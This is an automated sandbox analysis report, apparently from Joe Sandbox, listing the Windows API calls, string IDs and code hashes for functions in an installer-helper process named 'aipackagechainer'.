                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: 2Wup1Wu$p2Wu3Wu
                                          • API String ID: 2295610775-4124002120
                                          • Opcode ID: f03c45361ff97a3acae522036262f2bdad737e9ba1b0d716a6bb555ba45ba5b6
                                          • Instruction ID: be6bf0fc86bfac6e4b3db298b8b59f9176a66cf51826abc9f34953f0b40252c0
                                          • Opcode Fuzzy Hash: f03c45361ff97a3acae522036262f2bdad737e9ba1b0d716a6bb555ba45ba5b6
                                          • Instruction Fuzzy Hash: A481AE70D01259DFDB24DFA8C999BEEB7B5FF04300F648299E415A7291EB706E84CB90
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(?,2000000B,000E7378,00000002,00000000,?,?,?,000E7378,?,00000000), ref: 000E70F3
                                          • GetLocaleInfoW.KERNEL32(?,20001004,000E7378,00000002,00000000,?,?,?,000E7378,?,00000000), ref: 000E711C
                                          • GetACP.KERNEL32(?,?,000E7378,?,00000000), ref: 000E7131
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 51d37c046fee621d6e6d8d336ef9a0a6d9709eef14998a5426638577615fc506
                                          • Instruction ID: acad85dffd185d3e2c3d8f28c36ab563f0a34b844fea34826a8cc75b9d6a0e97
                                          • Opcode Fuzzy Hash: 51d37c046fee621d6e6d8d336ef9a0a6d9709eef14998a5426638577615fc506
                                          • Instruction Fuzzy Hash: 9321A432608381EEEB758B6ACD04AA773E6BB50B50B568464E90EF7114E732DD41D350
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 000E733B
                                          • IsValidCodePage.KERNEL32(00000000), ref: 000E7384
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 000E7393
                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 000E73DB
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 000E73FA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                          • String ID:
                                          • API String ID: 415426439-0
                                          • Opcode ID: 319bafa9c1602b48a1dc78a29a28e9c4e81ac529e7390df2c098680ad15baf4c
                                          • Instruction ID: bf42435306bc80d56ea57f9eefeb5a158a4a26b9374be786dade32ce1403daec
                                          • Opcode Fuzzy Hash: 319bafa9c1602b48a1dc78a29a28e9c4e81ac529e7390df2c098680ad15baf4c
                                          • Instruction Fuzzy Hash: 3D517D71A04246AFEB60DFA6CC41EBEB7B8BF18700F184469B918F7191E7709A449B60
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • GetACP.KERNEL32(?,?,?,?,?,?,000DBEC3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000E698C
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,000DBEC3,?,?,?,00000055,?,-00000050,?,?), ref: 000E69B7
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 000E6B1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                          • String ID: utf8
                                          • API String ID: 607553120-905460609
                                          • Opcode ID: b6df40bdbe885fd90201e308d666ebd7e96b9a25cfe094d515692ca5fc3fc047
                                          • Instruction ID: 8cad41c302784215fb3be843610d6f04ce5f94ab77ace2f6d3526003cdea6b38
                                          • Opcode Fuzzy Hash: b6df40bdbe885fd90201e308d666ebd7e96b9a25cfe094d515692ca5fc3fc047
                                          • Instruction Fuzzy Hash: 7F71E771A00342AED724AB76EC46BBA73EDEF64780F14443AF505F7182EB72E940C661
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 000A4D56
                                          • FindClose.KERNEL32(00000000), ref: 000A4EA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: 2Wup1Wu$%d.%d.%d.%d
                                          • API String ID: 2295610775-1593205671
                                          • Opcode ID: 75c3e94e655db7128b659b70eeab9b6c9ff9cd0d4bb49021303e5080268f0ca7
                                          • Instruction ID: fe171f5c110df980170155366a4f4944da8aae096d6de745ba72bb542ebffad5
                                          • Opcode Fuzzy Hash: 75c3e94e655db7128b659b70eeab9b6c9ff9cd0d4bb49021303e5080268f0ca7
                                          • Instruction Fuzzy Hash: 91618A71905219EFDF60DF68CC48B9DBBB4EF45314F108299E818AB292DB759E84CF90
                                          APIs
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000A5E1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: DiskFreeSpace
                                          • String ID: \$\$\
                                          • API String ID: 1705453755-3791832595
                                          • Opcode ID: 68190a349c911ad6764b29064c0b0bf5cc66e2495aa18fb995b4b47dfc258bf9
                                          • Instruction ID: 87f5026da978adc84b511294992c15f906db2f7f95ed9f1eef859457b8c50d6d
                                          • Opcode Fuzzy Hash: 68190a349c911ad6764b29064c0b0bf5cc66e2495aa18fb995b4b47dfc258bf9
                                          • Instruction Fuzzy Hash: DC41D172A00611CBCB74DFA48844AABB3F4FF9A355F154A2EE8D897040F3318E8482C6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID:
                                          • API String ID: 3213747228-0
                                          • Opcode ID: 8ca64c449092e6b0a1a4d2b37ba288081dd802d3c6ee4d8efc7f340604143337
                                          • Instruction ID: 0c68cae9d6eb67dd5592d7fa74d33196fa64263bcd7251571018fdd081404694
                                          • Opcode Fuzzy Hash: 8ca64c449092e6b0a1a4d2b37ba288081dd802d3c6ee4d8efc7f340604143337
                                          • Instruction Fuzzy Hash: 23B112329053859FDB25AF68C891BEEBBE5EF59350F14816BE804AF342D6359D01CBB0
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000CD359
                                          • IsDebuggerPresent.KERNEL32 ref: 000CD425
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000CD445
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 000CD44F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 3000e999edaeeb760efee37607261f45f73c13ea49cfde3c6333f44f0feb83c8
                                          • Instruction ID: 1e3f05f0d6d86b9929c1a5d90f08a479892d538887f199010ce23540a2f4a747
                                          • Opcode Fuzzy Hash: 3000e999edaeeb760efee37607261f45f73c13ea49cfde3c6333f44f0feb83c8
                                          • Instruction Fuzzy Hash: 09312975D052189BEB60DFA4D989BCDBBF8BF08304F1041AAE40DAB250EB749A85DF45
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,00000000,?,?,?,0000000C,000F70DD,000000FF), ref: 0009CEFB
                                          • FindClose.KERNEL32(00000000,?,0000000C,000F70DD,000000FF), ref: 0009CF3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: 2Wup1Wu
                                          • API String ID: 2295610775-403849135
                                          • Opcode ID: ab7d73fa367c02134e3b959fa861cd931f991dd650cf698c370b8035ffb3280e
                                          • Instruction ID: 0d947821288de2475bda424314628ffcd596b61e3f4259dc3d9a2510b255b6f6
                                          • Opcode Fuzzy Hash: ab7d73fa367c02134e3b959fa861cd931f991dd650cf698c370b8035ffb3280e
                                          • Instruction Fuzzy Hash: 8341A030904649DFDF20DF68C958BEEBBF5EF45314F148269E825AB291D7349A04DB90
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • GetLocaleInfoW.KERNEL32(?,00000002,0010C418,00000000,?,00000000), ref: 000AEDE1
                                          • GetLocaleInfoW.KERNEL32(?,00000002,00000015,?,00000078,-00000001,?,00000002,0010C418,00000000,?,00000000), ref: 000AEE1D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: InfoLocale$HeapProcess
                                          • String ID: %d-%s
                                          • API String ID: 3246605784-1781338863
                                          • Opcode ID: df63abd8d9ab79f1553e6dc28f6bcc0545c98aaff8da6930c09860b583082d23
                                          • Instruction ID: f86bdc6c826788a51a2834bf02cd6b9181f798a9d1baa2f1251eaa74953df1bc
                                          • Opcode Fuzzy Hash: df63abd8d9ab79f1553e6dc28f6bcc0545c98aaff8da6930c09860b583082d23
                                          • Instruction Fuzzy Hash: 7531ABB1A00649AFD710DF98CC49BAEFBB8FF45714F108269F515AB2D2DBB55900CB90
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,D11C52E5,?,00000000,00000000,00000000,000F25FD,000000FF), ref: 00085E68
                                          • FindClose.KERNEL32(00000000,?,D11C52E5,?,00000000,00000000,00000000,000F25FD,000000FF), ref: 00085EB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: 2Wup1Wu
                                          • API String ID: 2295610775-403849135
                                          • Opcode ID: 2c8cbccd009f9f83b89a523a5c3a7033f446e90656c53f9eedcc0c252fff06fb
                                          • Instruction ID: 02ac69a22440842ad1acf26ee3b9f35d21e5ec5f837f7d9cc3f13a550e48c2ef
                                          • Opcode Fuzzy Hash: 2c8cbccd009f9f83b89a523a5c3a7033f446e90656c53f9eedcc0c252fff06fb
                                          • Instruction Fuzzy Hash: 5221B072900948DFD720EF68CD49BEEB7B8FF44721F104269E825A72D0DB745A08CB90
                                          APIs
                                            • Part of subcall function 0007E9D0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,D11C52E5,?,Function_0008BD60,000000FF), ref: 0007E9F7
                                            • Part of subcall function 0007E9D0: GetLastError.KERNEL32(?,00000000,00000000,D11C52E5,?,Function_0008BD60,000000FF), ref: 0007EA01
                                          • IsDebuggerPresent.KERNEL32(?,?,?,000616CF), ref: 000CA08E
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000616CF), ref: 000CA09D
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000CA098
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3511171328-631824599
                                          • Opcode ID: 67216c4e02c8db985dad789767ac2bbd6323cfcdd8c64057419adffa91da5af4
                                          • Instruction ID: 3be3d4e044550b1b6b1051149fb2c8094a69f588fd68f1bf6575dddb41df5aa8
                                          • Opcode Fuzzy Hash: 67216c4e02c8db985dad789767ac2bbd6323cfcdd8c64057419adffa91da5af4
                                          • Instruction Fuzzy Hash: 9DE022B03017908FE3709F38E80479A7BE0AF04748F00881DE846C2A51EBB8E844DB53
                                          APIs
                                            • Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
                                            • Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6D32
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6D7C
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6E42
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ErrorLast
                                          • String ID:
                                          • API String ID: 661929714-0
                                          • Opcode ID: 771d1ccfb765da62dfbf91cbcb6e8538fd89a8d7b2c61b229706c04ac10a5538
                                          • Instruction ID: d9f96490251c88077641febd01b7f26555e67b20e034f53597e87b6ea0cd43ce
                                          • Opcode Fuzzy Hash: 771d1ccfb765da62dfbf91cbcb6e8538fd89a8d7b2c61b229706c04ac10a5538
                                          • Instruction Fuzzy Hash: 8661C371900247DFDB689F26EC92BBAB7E8EF14340F10407AED05E6282EB35D990DB50
                                          APIs
                                          • GetVersionExW.KERNEL32 ref: 000C6C68
                                          • GetVersionExW.KERNEL32(?), ref: 000C6CB3
                                          • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 000C6CC7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Version$FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 1871528217-0
                                          • Opcode ID: e523b046770c2a562e4ebe38e7b0470136c0e0fc230d1963be347a511f065e4a
                                          • Instruction ID: 1e7570f95ff46e8623886ec02e7f21dca296e9daa2f715969da30564fdf29f9d
                                          • Opcode Fuzzy Hash: e523b046770c2a562e4ebe38e7b0470136c0e0fc230d1963be347a511f065e4a
                                          • Instruction Fuzzy Hash: 62613832B142244BE318CF29CCD5AAFBBD5EBC9345F04463EE486C7291D6B9C955CBA0
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000D176B
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000D1775
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 000D1782
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 4fbbe103d8695f570f4922be7d0a42f6fbc4010ae9fffe1187245206f54dd44f
                                          • Instruction ID: 19a7f57f004f1563b2ad39aefef1f7a82dbb413d267422c87e9e68d4c6fb1dab
                                          • Opcode Fuzzy Hash: 4fbbe103d8695f570f4922be7d0a42f6fbc4010ae9fffe1187245206f54dd44f
                                          • Instruction Fuzzy Hash: 5331B775901228ABCB61DF24D889BDDBBB8BF08310F5041EAE41CA6261EB749B858F55
                                          APIs
                                          • GetLocalTime.KERNEL32(?,D11C52E5), ref: 000887FE
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          Strings
                                          • %04d-%02d-%02d %02d-%02d-%02d, xrefs: 00088840
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: HeapLocalProcessTime
                                          • String ID: %04d-%02d-%02d %02d-%02d-%02d
                                          • API String ID: 1554148984-3768011868
                                          • Opcode ID: 8d3f152827bceb175cf959a7cc4313cb32492c11814407d1412636f9304d0056
                                          • Instruction ID: 9e1e9597de9ce9f7601d6fc62aac84eb7e6171cdad8360a63f6ad9eb7fda0065
                                          • Opcode Fuzzy Hash: 8d3f152827bceb175cf959a7cc4313cb32492c11814407d1412636f9304d0056
                                          • Instruction Fuzzy Hash: 4E219AB1D10218AFDB14DF99D941BFEB7F8EB0C710F10422AF951A3281EB789940CBA5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7005f14389522480ac6fb9852cd731dda82be8c916b1cc2d4119a756cf47b29a
                                          • Instruction ID: 40d721d5c4e4eeb327bc75bb76efa03af6f0310a6b68fee2a0a9819a74f8d36a
                                          • Opcode Fuzzy Hash: 7005f14389522480ac6fb9852cd731dda82be8c916b1cc2d4119a756cf47b29a
                                          • Instruction Fuzzy Hash: 46F12E71E012199FDF14CF69C8906ADB7F1FF98324F15826AE915AB381D730AE41CB90
                                          APIs
                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,D11C52E5,?,?), ref: 0008771B
                                          • GetLastError.KERNEL32 ref: 00087725
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AllocateErrorFormatHeapLastMessage
                                          • String ID:
                                          • API String ID: 4114510652-0
                                          • Opcode ID: 42a6968785f8d8abd35a7b3d67caaa5cde02a53994d1edc6a930abb1cca3b262
                                          • Instruction ID: 3e19e3d48a025736e504f8cd825b86fb4ab2429fa7ac5f6f96337179b26edd97
                                          • Opcode Fuzzy Hash: 42a6968785f8d8abd35a7b3d67caaa5cde02a53994d1edc6a930abb1cca3b262
                                          • Instruction Fuzzy Hash: 8241D072A082099BEB14DF98C8057AEB7E4FF44714F24466AE909A7781DBB59A04C790
                                          APIs
                                          • __set_se_translator.LIBVCRUNTIME ref: 0006CAC5
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00023D00), ref: 0006CADB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
